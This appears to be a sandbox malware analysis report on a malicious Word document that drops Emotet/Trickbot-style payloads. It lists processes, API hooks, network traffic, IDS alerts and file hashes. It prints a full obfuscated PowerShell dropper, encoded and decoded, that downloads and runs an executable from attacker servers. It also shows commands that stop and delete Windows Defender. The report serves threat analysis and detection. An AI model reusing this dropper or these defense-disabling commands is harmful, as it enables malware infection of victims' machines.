"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000019.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4C6B9B43-EDD9-4FF0-BF0F-7997885F684E}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B5938D7A-39BC-45CB-A464-8EFD9287CCB1}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B5938D7A-39BC-45CB-A464-8EFD9287CCB1}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AA76EA6-9F01-4A9F-A9FB-A70FFC59C7E5}.tmp" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ib"
Pattern match: "http://schemas.microsoft.com/aml/2001/core"
Heuristic match: "ipinfo.io"
Heuristic match: "GET /ip HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: ipinfo.io"
Heuristic match: "api.ipify.org"
Heuristic match: "GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: api.ipify.org"
Heuristic match: "162.12.124.64.cbl.abuseat.org"
Heuristic match: "162.12.124.64.zen.spamhaus.org" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e9abc02b00cc" to virtual address "0xFEA24060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e933f02b00" to virtual address "0xFEA21180" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "02329c1641cdd401" to virtual address "0xE4FA25D8" (part of module "MSCORWKS.DLL")
"WINWORD.EXE" wrote bytes "06b2511341cdd401" to virtual address "0xEBB4D610" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFEE450C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "72c0831341cdd401" to virtual address "0x3FFD3258" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b5213c1341cdd401" to virtual address "0xF3250160" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "f5ae371341cdd401" to virtual address "0xE5ADDE48" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "dba2411341cdd401" to virtual address "0xF34CFA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "3e87411341cdd401" to virtual address "0xECDF2350" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e933ef2b00cccc" to virtual address "0xFEA21210" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e94b9f2b00cccccccccc" to virtual address "0xFEA26230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48b8bc5273eafe070000ffe0" to virtual address "0x76BE9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "d0fe7c1341cdd401" to virtual address "0xEEDF71C0" (part of module "WWLIB.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52877AA" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52878AD" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE5287A60" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE5287A25" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52874FB" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE528863C" (part of module "MSCORWKS.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
Enc_message_859897272.doc
- Filename
- Enc_message_859897272.doc
- Size
- 188KiB (192029 bytes)
- Type
- doc office
- Description
- XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 977da43966cf6a1a04c30e077083b1f76da9f224596923c869b6aafdf102f022
- MD5
- 161082ffc5f09ec0da7812dc73fb68b2
- SHA1
- 28a90b754dae78e27db1ffc997688f473cf77ac8
- ssdeep
- 3072:9mdGNRMht7Q2Q9xKxaSqlzLhpDU4e08RGiWCKiG1mM0OrfFwMT2c:9vNR0cQaSGJUvAbC3M0SfR
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 23 processes in total.
- WINWORD.EXE /n "C:\Enc_message_859897272.doc" (PID: 2132)
- powershell.exe poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnACsAJwAwADIANAAyACcAKQA7ACQARwA2AF8AXwAxADEANwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAXwAwAF8ANQBfAF8AXwA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnADMANQAuADEAJwArACcAOAA0ACcAKwAnAC4ANgAxAC4AJwArACcAMgAnACsAJwA1ADQAJwArACcALwB0AGcAJwArACcAOQBwACcAKwAnAHoAZABZAEAAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA1ADIAJwArACcALgAnACsAJwAyADAAJwArACcANAAuADEAOAA2AC4AMQAwADIALwBQAEEAUwBtACcAKwAnAGsAdgBtAGIAJwArACcAQABoAHQAdABwADoALwAvADUANAAuACcAKwAnADEANwAnACsAJwAyAC4AOAAnACsAJwA1ACcAKwAnAC4AJwArACcAMgAyACcAKwAnADEALwBUACcAKwAnAGkAMAAnACsAJwBKAGUASgB1ACcAKwAnADkAJwArACcAQABoAHQAJwArACcAdABwADoALwAvADUAMgAuACcAKwAnADcAMAAnACsAJwAuACcAKwAnADIAMwAnACsAJwA5AC4AMgAyADkALwBiACcAKwAnAGwAbwBnAC8AdwBwAC0AJwArACcAYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAHUAcABsAG8AJwArACcAYQBkAHMALwAnACsAJwBQAFoAOQA2AFgAJwArACcAaQBiAEUAVQBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAyACcAKwAnADIAMgAuADEAMAA2ACcAKwAnAC4AMgAnACsAJwAxACcAKwAnADcALgAzACcAKwAnADcALwAnACsAJwB3AG8AJwArACcAcgAnACsAJwBkAHAAcgBlAHMAJwArACcAcwAvADMASQAnACsAJwAxAGUANQAnACsAJwBKAHgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARQBfAF8AMQA4ADYANwA9ACgAJwBjAF8AJwArACcAXwBfADQANwAnACkAOwAkAG0ANABfAF8ANQBfADIAMAAgAD0AIAAnADQANgAnADsAJABoADEANQA1ADcANAA9ACgAJwBxADQAJwArACcANAA0ADAAXwAnACkAOwAkAEoAMAA2AF8ANgA4ADQAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQA0AF8AXwA1AF8AMgAwACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBfADgANgAxADYAOQAgAGkAbgAgACQAYwBfADAAXwA1AF8AXwBfACkAewB0AHIAeQB7ACQARwA2AF8AXwAxADEANwA5AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAXwA4ADYAMQA2ADkALAAgACQASgAwADYAXwA2ADgANABfACkAOwAkAGwAOAA1AF8AXwBfAD0AKAAnAGgAJwArACcAXwBfACcAKwAnAF8AMAAzACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwA7ACQASQAzADcANAAyAF8AOAA9ACgAJwBMADkAMwAnACsAJwBfACcAKwAnADEAXwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcAXwAzADMAXwAzADQAPQAoACcAUQAyADAAJwArACcAMAAxADAAMQAnACkAOwA= (PID: 3304, Additional Context: $W3_5463_=('h86_'+'0242');$G6__1179=new-object Net.WebClient;$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ibEUU@http'+'://2'+'22.106'+'.2'+'1'+'7.3'+'7/'+'wo'+'r'+'dpres'+'s/3I'+'1e5'+'Jx').Split('@');$E__1867=('c_'+'__47');$m4__5_20 = '46';$h15574=('q4'+'440_');$J06_684_=$env:userprofile+'\'+$m4__5_20+('.e'+'xe');foreach($U_86169 in $c_0_5___){try{$G6__1179.DownloadFile($U_86169, $J06_684_);$l85___=('h'+'__'+'_03');If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;$I3742_8=('L93'+'_'+'1__5');break;}}catch{}}$w_33_34=('Q20'+'0101');)
-
limewcs.exe
(PID: 3664)
16/70
-
limewcs.exe
(PID: 1916)
16/70
-
ZOhPSkmvRrgs3fH129U.exe
(PID: 3880)
11/69
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 1712)
-
cmd.exe
/c sc stop WinDefend
(PID: 3224)
- sc.exe sc stop WinDefend (PID: 3280)
-
cmd.exe
/c sc delete WinDefend
(PID: 1708)
- sc.exe sc delete WinDefend (PID: 3124)
-
cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
(PID: 3428)
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 2160)
-
ZPhQTlnvSsgt3fI129V.exe
(PID: 1992)
11/69
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3676)
-
cmd.exe
/c sc stop WinDefend
(PID: 1152)
- sc.exe sc stop WinDefend (PID: 1592)
-
cmd.exe
/c sc delete WinDefend
(PID: 3908)
- sc.exe sc delete WinDefend (PID: 4056)
-
cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
(PID: 3004)
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3640)
- svchost.exe (PID: 3320)
-
ZOhPSkmvRrgs3fH129U.exe
(PID: 3880)
11/69
-
limewcs.exe
(PID: 1916)
16/70
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
162.12.124.64.cbl.abuseat.org
OSINT |
127.0.0.2
TTL: 2099 |
Gandi SAS
Organization: CBL, a division of Spamhaus Name Server: NS3.SPAMHAUS.ORG Creation Date: Sat, 23 Feb 2002 00:50:34 GMT |
Reserved |
162.12.124.64.zen.spamhaus.org
OSINT |
- |
Gandi SAS
Organization: The Spamhaus Project Name Server: NS20.JA.NET Creation Date: Fri, 01 Oct 1999 11:03:57 GMT |
- |
api.ipify.org
OSINT |
107.22.215.20
TTL: 2010 |
eNom, Inc.
Name Server: NS1.DNSIMPLE.COM Creation Date: Sun, 05 Jan 2014 22:02:15 GMT |
United States |
ipinfo.io
OSINT |
216.239.32.21
TTL: 268 |
http://www.nic.ac/go/whois/ipinfo.ac | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
35.184.61.254 |
80
TCP |
powershell.exe PID: 3304 |
United States |
52.204.186.102 |
80
TCP |
powershell.exe PID: 3304 |
United States |
74.59.106.11 |
8080
TCP |
limewcs.exe PID: 1916 |
Canada |
216.239.32.21 |
80
TCP |
svchost.exe PID: 3320 |
United States |
103.122.84.170 |
449
TCP |
svchost.exe PID: 3320 |
India |
107.22.215.20 |
80
TCP |
svchost.exe PID: 3732 |
United States |
45.250.66.10 |
449
TCP |
svchost.exe PID: 3732 |
India |
31.131.18.108 |
447
TCP |
svchost.exe PID: 3732 |
Ukraine |
195.123.245.16 |
443
TCP |
svchost.exe PID: 3732 |
Ukraine |
212.80.216.238 |
447
TCP |
svchost.exe PID: 3732 |
Spain |
190.146.112.216 |
8082
TCP |
svchost.exe PID: 2368 |
Colombia |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
35.184.61.254:80 | GET | 35.184.61.254/tg9pzdY | GET /tg9pzdY HTTP/1.1
Host: 35.184.61.254
Connection: Keep-Alive More Details |
35.184.61.254:80 | GET | 35.184.61.254/tg9pzdY/ | GET /tg9pzdY/ HTTP/1.1
Host: 35.184.61.254 More Details |
52.204.186.102:80 | GET | 52.204.186.102/PASmkvmb | GET /PASmkvmb HTTP/1.1
Host: 52.204.186.102
Connection: Keep-Alive More Details |
52.204.186.102:80 | GET | 52.204.186.102/PASmkvmb/ | GET /PASmkvmb/ HTTP/1.1
Host: 52.204.186.102 More Details |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1
Cookie: 10250=LrpInODSRsb+vp6tz83xjyNq6D1OvY5xXJgDH23xClkQ0X06uVlfQDrXpmRYu8xBxXCbESFXZmi2W3ELyajE3s9bq6S3Ey9O09Jhtqbic9qacqnAFtHuq4y/6zVdQUllD9Mt7uor/aYRIxA2o1yw9mUATQwWL4Rw94eOWJKYCH9pBq6E8DwyTWEysP4MQ8CWbsObOzBJIv0qN65WLt2oOSjrZLNfbMH0vwLj/JhlXFDcxMj2SvaI/B4Av4Ib6jzyZZaIf/D7C1fE/ov9YpxhmMAzrNrub0Egt3VNAUgARrVM5aB1EKpczNRbWuTjtb25h+1UVHak61JXHFLHHq79zT71k75mSXn+rpGFK2eWbYnmMNgKsBh57eGYw4Fg7c5T1xl4G/7dkObf6rUxHyD9sTGPX/QnklDdgmalXieptNGTzXe0vsxhijAo7JYMwutaJw8DpA==
User-Agent: Mozilla/4.0 (c... More Details |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1
Cookie: 10250=LrpInODSRsb+vp6tz83xjyNq6D1OvY5xXJgDH23xClkQ0X06uVlfQDrXpmRYu8xBxXCbESFXZmi2W3ELyajE3s9bq6S3Ey9O09Jhtqbic9qacqnAFtHuq4y/6zVdQUllD9Mt7uor/aYRIxA2o1yw9mUATQwWL4Rw94eOWJKYCH9pBq6E8DwyTWEysP4MQ8CWbsObOzBJIv0qN65WLt2oOSjrZLNfbMH0vwLj/JhlXFDcxMj2SvaI/B4Av4Ib6jzyZZaIf/D7C1fE/ov9YpxhmMAzrNrub0Egt3VNAUgARrVM5aB1EKpczNRbWuTjtb25h+1UVHak61JXHFLHHq79zT71k75mSXn+rpGFK2eWbYnmMNgKsBh57eGYw4Fg7c5T1xl4G/7dkObf6rUxHyD9sTGPX/QnklDdgmalXieptNGTzXe0vsxhijAo7JYMwutaJw8DpA==
User-Agent: Mozilla/4.0 (c... More Details |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1
Cookie: 30610=NO7QSVXRVOw6x6j2XUvbkbLD3gRIkbFaQIeqg7iOWIBg4+4QzmyfwnPE2iZVm8YqwejBCADs7XEOHz+nuln8N1wwk5XrUv2D/uj5AfYQRErXLoiUv1LBCNFUE27n410i6wBHEFjqVMDoq38CUuN4OzRAdNQQBELNoCdGZri+/+byTW/Rpo9o2PakP1O2zFDm38RBdjlNsdSnMBEAcbBtQ3x8lPNZKr47m6zNBB6qdsk3XK3d+0gBx0hGqIe+LpXwHk5FuLo4LErubwClBjQ85YAl7rhTZiSwJOmAsXcjTf13SD6OLEAt5Ror4ULSLjDTzp/pD3IvGvcGducmX12WOPoLyuF7BZLgfDioux1PZ6iI7gTcb0dCcX2r0KxOz8CNCChCNuVIH4FUGHuxIoQWHDrpxbUes9IRHqhXPnE+dUXISSFfpwn5qsnpgiYgCtmmXcRgUA==
User-Agent: Mozilla/4.0 (c... More Details |
216.239.32.21:80 (ipinfo.io) | GET | ipinfo.io/ip | GET /ip HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: ipinfo.io More Details |
107.22.215.20:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: api.ipify.org More Details |
190.146.112.216:8082 | POST | 190.146.112.216/del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 | POST /del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 190.146.112.216:8082
Content-Length: 154
Cache-Control: no-cache More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 107.22.215.20:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org | 2021997 |
local -> 216.239.32.21:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Possible External IP Lookup ipinfo.io | 2020716 |
31.131.18.108 -> local:49182 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
52.204.186.102 -> local:49162 (TCP) | - | - | - |
195.123.245.16 -> local:49185 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
212.80.216.238 -> local:49186 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
195.123.245.16 -> local:49187 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
Extracted Strings
Extracted Files
-
Malicious 3
-
-
ZOhPSkmvRrgs3fH129U.exe
- Size
- 187KiB (190976 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Malware.Heuristic" (11/69)
- Runtime Process
- limewcs.exe (PID: 1916)
- MD5
- 6cfda02865edccaf334560e7ad9a1c36
- SHA1
- 8129b93024ad35231d40d6f25e88e7ed55444873
- SHA256
- 24b671b72df6949d896c497376444f23a714926bbffdb2221de85fbbb2078baf
-
46.exe
- Size
- 236KiB (241664 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "BehavesLike.Emotet" (16/70)
- Runtime Process
- 46.exe (PID: 2412)
- MD5
- 5f5c909eb5e68ffb1f3475a1c8d6c933
- SHA1
- 92c54833bc36fdf9dd3b60241acec9072ba2b737
- SHA256
- 499a87bc17a49136c784d3e10cd2b90b999eb4feea2cf50f06c93f0eff2db52f
-
ZPhQTlnvSsgt3fI129V.exe
- Size
- 187KiB (190976 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Malware.Heuristic" (11/69)
- MD5
- 6cfda02865edccaf334560e7ad9a1c36
- SHA1
- 8129b93024ad35231d40d6f25e88e7ed55444873
- SHA256
- 24b671b72df6949d896c497376444f23a714926bbffdb2221de85fbbb2078baf
-
-
Clean 1
-
-
~_c_message_859897272.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/57
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative 9
-
-
613245a6258220a31eae4344732fc929_6b06490d-f9fd-424c-8b6d-83edc4369e89
- Size
- 1KiB (1067 bytes)
- Type
- data
- Runtime Process
- ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
- MD5
- 361ac0735bd95a4dd1792b1eca13e545
- SHA1
- e8468368db6279822d405fba3b25d68d383aa2fa
- SHA256
- e04e6b0071fd35fa523ca618513e599a538c54a2e4321e58d1ae98fd133d1100
-
Enc_message_859897272.LNK
- Size
- 518B (518 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Feb 25 19:33:16 2019, mtime=Mon Feb 25 19:33:16 2019, atime=Mon Feb 25 19:33:24 2019, length=192029, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 535110b0b62d0674acfa696b45853420
- SHA1
- d1b622c0a9d8ab1c0335c0d3432b2e0529f9f811
- SHA256
- 770f0dcedbb648b1962c69ef1f872164132493e42230cfd437aaf17902491949
-
index.dat
- Size
- 138B (138 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 8e3f6c24da3d8e70b069613ac6d54ddd
- SHA1
- 207d98a8888bb3773305953f13eac2c067b6ff19
- SHA256
- ddff46672830d7409efc5d3a17f4248b0da32b949251a86d828ec18916344004
-
6QIW9QO31PIEZF62WBMQ.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3304)
- MD5
- d0ce95c9dd0c18f24d42644fab1c420a
- SHA1
- 41dea125c519d59ead1497f3eda570f2cbb1a1b7
- SHA256
- db333058224c3bcddb2e744ce924e4b862a285999006be957bf3374c97b0b19f
-
settings.ini
- Size
- 70KiB (71433 bytes)
- Type
- text
- Description
- FORTRAN program, ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- svchost.exe (PID: 3320)
- MD5
- b8843ba7336e2524d5edd6cb49e309f4
- SHA1
- 8abdabe665f5d0694e6c033a59a935b5af2134a5
- SHA256
- d8e5318dff7a9cb56b8c8ef270289fd4ec71b9298aa54d383f8da92505f52a16
-
78F892B4.w6687_
- Size
- 65KiB (66553 bytes)
- Type
- img image
- Description
- JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1409x624, frames 3
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 638118b841157824fb5fa270c717bd18
- SHA1
- 18eb4270ce86080f25280e5141842404784673c6
- SHA256
- 76db61fb3f22d579ba9d542eacd3fa6fedbc6db71294da924a063a2bb5bbefe0
-
~WRS_E7EB73ED-EE40-4DBE-81AA-CD3F1390723D_.tmp
- Size
- 1.6KiB (1606 bytes)
- Type
- data
- MD5
- 9fba1d67656864bef14e1adb41424565
- SHA1
- 1c741295a8f753f83161d6d9ca6c7060a5f5b2a9
- SHA256
- 2b8df0de8851e7293ec9fb0c619c36f8bc618ee595956c99ab09bfe392cbe257
-
~WRS_4C6B9B43-EDD9-4FF0-BF0F-7997885F684E_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
Notifications
-
Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-0" are available in the report
- Not all sources for indicator ID "api-1" are available in the report
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "target-25" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report